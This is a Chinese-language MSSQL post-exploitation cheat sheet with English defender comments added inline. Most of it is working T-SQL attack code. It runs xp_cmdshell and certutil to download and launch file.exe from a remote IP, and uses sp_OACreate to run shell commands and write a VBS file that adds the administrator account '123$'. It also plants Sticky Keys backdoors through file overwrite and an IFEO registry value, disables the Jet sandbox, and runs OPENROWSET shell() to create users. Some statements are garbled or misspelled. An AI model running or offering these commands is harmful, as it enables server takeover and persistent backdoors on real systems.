MSSQL提权与站库分离
1.权限
2.默认数据库
master、model、msdb、Northwind、pubs、tempdb
0x00 xp_cmdshell
-- xp_cmdshell: runs an OS command line from T-SQL under the SQL Server
-- service account. As written, the first call fetches a file with certutil
-- and the second launches it. The option is off by default and normally
-- needs sysadmin to enable.
-- Defender notes: keep xp_cmdshell disabled via sp_configure, run the service
-- under a low-privilege account, and alert on child processes of sqlservr.exe
-- (cmd.exe / certutil with -urlcache is a well-known download pattern).
exec master.dbo.xp_cmdshell 'cd c:www & certutil -urlcache -split -f
http://192.168.130.142:80/download/file.exe';
exec master.dbo.xp_cmdshell 'cd c:www & file.exe';
如果 xp_cmdshell 被删除,可以尝试恢复。
-- Re-registers xp_cmdshell from xplog70.dll after the procedure has been
-- dropped. Defender note: dropping the extended procedure is not a control on
-- its own; audit sp_addextendedproc calls and keep the underlying option
-- disabled with sp_configure instead.
exec sp_addextendedproc 'xp_cmdshell','Xplog70.dll'
0x01 sp_oacreate
开启
-- Turns on OLE Automation procedures (sp_OACreate / sp_OAMethod). The
-- 'show advanced options' switch has to be on before the OLE option can be
-- changed. Defender note: every sp_configure change is written to the SQL
-- Server error log; keep 'Ole Automation Procedures' at 0 and alert when it
-- flips to 1.
exec sp_configure 'show advanced options',1;reconfigure;
exec sp_configure 'ole automation procedures',1;recofigure;
关闭
-- Reverts the change above: OLE Automation back to 0, then hides the advanced
-- options again. This is the state a hardened instance should stay in.
exec sp_configure 'show advanced options',1;reconfigure;
exec sp_configure 'ole automation procedures',0;reconfigure;
exec sp_configure 'show advanced options',0;reconfigure;
1.调用cmd 来执行命令
w.shell执行命令
-- Creates a COM shell object with sp_OACreate and invokes its 'run' method on
-- cmd.exe. Nothing is returned to the caller (see the note below), and the
-- command runs as the SQL Server service account.
-- Defender note: sp_OACreate is rare in legitimate workloads and is a strong
-- audit signal; disable OLE Automation and use a non-administrative service
-- account so this path cannot escalate.
declare @shell int exec sp_oacreate 'w.shell',
@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c xxx'
使用OLE自动存储过程执行命令,不返回执行结果,需将结果输出到一个文本中,然后使用xp_readerrorlog读取文本
Shell.Application执行命令,想查看结果时:
-- Same pattern with the Shell.Application COM object. The command's output is
-- redirected to a text file, and xp_readerrorlog is then pointed at that file
-- to read it back into the result set.
-- Defender note: xp_readerrorlog reading paths outside the LOG directory is a
-- useful anomaly to alert on, as are files written by sqlservr.exe outside
-- its data/log/backup locations.
declare @o int
exec sp_oacreate 'Shell.Application', @o out
exec sp_oamethod @o, 'run',null,'c:\windows\system32\cmd.exe /c net user>d:\e.txt'
exec master.dbo.xp_readerrorlog 1,'d:\e.txt'
2.写入启动项
-- Uses a FileSystemObject COM instance to write a .vbs file line by line. The
-- script it writes binds to the local machine over ADSI (WinNT://), creates a
-- user '123$' with password '123', and adds it to the Administrators group.
-- As shown, the snippet only writes the file; nothing here registers it as a
-- startup item despite the section title.
-- Defender notes: local account creation and Administrators membership
-- changes originating from a SQL Server process (Windows Security Event IDs
-- 4720 and 4732) are high-fidelity alerts; file writes by sqlservr.exe to
-- unexpected paths warrant review.
declare @sp_passwordxieo int, @f int, @t int, @ret int
exec sp_oacreate 'ing.filesystemobject', @sp_passwordxieo out
exec sp_oamethod @sp_passwordxieo, 'createtextfile', @f out, 'd:RECYCLER1.vbs', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,
'set wsnetwork=CreateObject("W.NETWORK")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'os="WinNT://"&wsnetwork.ComputerName'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set ob=GetObject(os)'
exec @ret = sp_oamethod @f, 'writeline', NULL,
'Set oe=GetObject(os&"/Administrators,group")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set od=ob.Create("user","123$")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'od.SetPassword "123"'
exec @ret = sp_oamethod @f, 'writeline', NULL,'od.SetInfo'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set of=GetObject(os&"/123$",user)'
exec @ret = sp_oamethod @f, 'writeline', NULL,'oe.add os&"/123$"';
3.粘滞键替换
-- Sticky Keys backdoor: copies explorer.exe over the sethc.exe accessibility
-- helper via FileSystemObject.CopyFile. Defender note: success requires the
-- service account to be able to overwrite protected System32 binaries, so it
-- is itself evidence of an over-privileged service; monitor writes to
-- sethc.exe and verify file integrity (SFC / known-good hashes).
declare @o int
exec sp_oacreate 'ing.filesystemobject', @o out
exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\sethc.exe';
-- Follow-up to the copy above: places the replaced sethc.exe into the cache
-- path as well, presumably so Windows File Protection does not restore the
-- original (intent inferred, not stated on the page). Defender note: writes
-- under the system DLL cache by a database process are a clear anomaly.
declare @o int
exec sp_oacreate 'ing.filesystemobject', @o out
exec sp_oamethod @o, 'copyfile',null,'c:\windows\system32\sethc.exe'
,'c:\windows\system32\dll\cache\sethc.exe';
大家可以灵活运用,这里也可以这样玩:把它写成vbs或者其他脚本来下载文件。为什么不直接调用cmd来下载?在2008系统上我没有成功,但是sp_oacreate可以启动这个文件,所以换个思路。
-- Writes a two-line batch file through FileSystemObject: '@echo off' followed
-- by a cmd /k line that runs certutil to download a file. The batch is only
-- written here; it is launched by the sp_OAMethod 'run' calls that follow.
-- Defender note: .bat/.vbs files created by sqlservr.exe, and certutil
-- -urlcache spawned from a database service, are both worth alerting on.
declare @sp_passwordxieo int, @f int, @t int, @ret int;
exec sp_oacreate 'ing.filesystemobject', @sp_passwordxieo out;
exec sp_oamethod @sp_passwordxieo, 'createtextfile', @f out, 'c:www1.bat', 1;
exec @ret = sp_oamethod @f, 'writeline', NULL,'@echo off';
exec @ret = sp_oamethod @f, 'writeline', NULL,'start cmd /k "cd c:www & certutil -urlcache -split -f http://192.168.130.142:80/download/file.exe"';
-- Runs the batch file written above through the COM shell object's 'run'
-- method (no output returned to the caller).
declare @shell int exec sp_oacreate 'w.shell',
@shell output exec sp_oamethod @shell,'run',null,'c:\www\1.bat'
-- Launches the downloaded executable the same way. Defender note: any new
-- process whose parent is sqlservr.exe deserves an alert; application
-- allow-listing on the database host blocks this stage regardless of how the
-- file arrived.
declare @shell int exec sp_oacreate 'w.shell',
@shell output exec sp_oamethod @shell,'run',null,'c:\www\file.exe'
当然这里只是一种思路,你完全可以用vbs来下载什么的
4.其他操作
0x04 其他操作
删除文件
-- Deletes a file via FileSystemObject.DeleteFile. This is the only snippet on
-- the page that releases its COM object with sp_OADestroy; the others leak
-- the handle until the batch ends. (@result is declared but never used.)
declare @result int
declare @fso_token int
exec sp_oacreate 'scripting.filesystemobject', @fso_token out
exec sp_oamethod @fso_token,'deletefile',null,'c:\1.txt'
exec sp_oadestroy @fso_token
复制文件
-- Copies a file via FileSystemObject.CopyFile (source, destination).
declare @o int
exec sp_oacreate 'scripting.filesystemobject',@o out
exec sp_oamethod @o,'copyfile',null,'c:\1.txt','c:\2.txt'
移动文件
-- Moves a file via FileSystemObject.MoveFile (source, destination).
declare @o int
exec sp_oacreate 'scripting.filesystemobject',@o out
exec sp_oamethod @o,'movefile',null,'c:\1.txt','c:\3.txt'
替换粘滞键
-- Sticky Keys replacement again, this time with the full
-- 'scripting.filesystemobject' ProgID: explorer.exe is copied over sethc.exe.
-- Defender note: see the earlier sethc.exe notes; integrity monitoring on
-- System32 accessibility binaries catches this regardless of the COM path used.
declare @o int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o,'copyfile',null,'c:\windows\explorer.exe', 'c:\windows\system32\sethc.exe'
-- Copies the already-replaced sethc.exe into the dllcache directory (the
-- second line is garbled as printed: '@oo i=out'). Defender note: writes into
-- dllcache from a database process are a clear indicator of tampering with
-- file-protection state.
declare @oo int
exec sp_oacreate 'scripting.filesystemobject', @oo i=out
exec sp_oamethod @oo,'copyfile',null,'c:\windows\system32\sethc.exe','c:\windows\system32\dllcache\sethc.exe'
0x02 沙盒
关闭沙盒模式
-- Writes SandBoxMode=0 under the Jet 4.0 engine key with xp_regwrite, then
-- reads the value back with xp_regread. Lowering sandbox mode is what allows
-- the OpenRowSet/shell() query below to run commands through the Jet engine.
-- Defender notes: xp_regwrite against HKLM from SQL Server is almost never
-- legitimate and should be audited or blocked; Jet 4.0 is a legacy 32-bit
-- provider and can be removed from database hosts. (The second statement's
-- argument list is mangled as printed.)
1. exec master..xp_regwrite
'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftJet4.0Engines','SandBoxMode','REG_DWORD',0;
2. exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines', 'SandBoxMode''REG_DWORD',0;
2.1
-- Ad hoc distributed query against a local Access (.mdb) file through the Jet
-- OLE DB provider; the query text uses Jet's shell() expression to create a
-- local user. Defender notes: keep 'Ad Hoc Distributed Queries' disabled,
-- restore the SandBoxMode value changed above, and treat OPENROWSET calls
-- naming Microsoft.Jet.OLEDB.4.0 as suspicious in query auditing.
4. Select * From
OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell( net user itpro gmasfm /add )');
0x03 xp_regwrite
修改注册表来劫持粘滞键。当然在2008数据库上是不成立的,因为默认权限很低。
-- Registry variant of the Sticky Keys hijack: sets an Image File Execution
-- Options 'Debugger' value for sethc.exe pointing at explorer.exe, so Windows
-- starts explorer instead of sethc. Defender notes: IFEO Debugger values are a
-- standard persistence/defence-evasion indicator — monitor value-set events on
-- that key (Sysmon Event ID 13) and block xp_regwrite for non-admin logins.
exec master..xp_regwrite
'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftWindowsNTCurrentVersionImage File Execution
Optionssethc.EXE','Debugger','REG_SZ','C:\WINDOWS\explorer.exe';
0x04 xp_regread /xp_regwrite
开放3389端口。
0x05 public
0x06 反弹注射技术
依靠opendatasource函数支持实现。
1.opendatasource 函数语法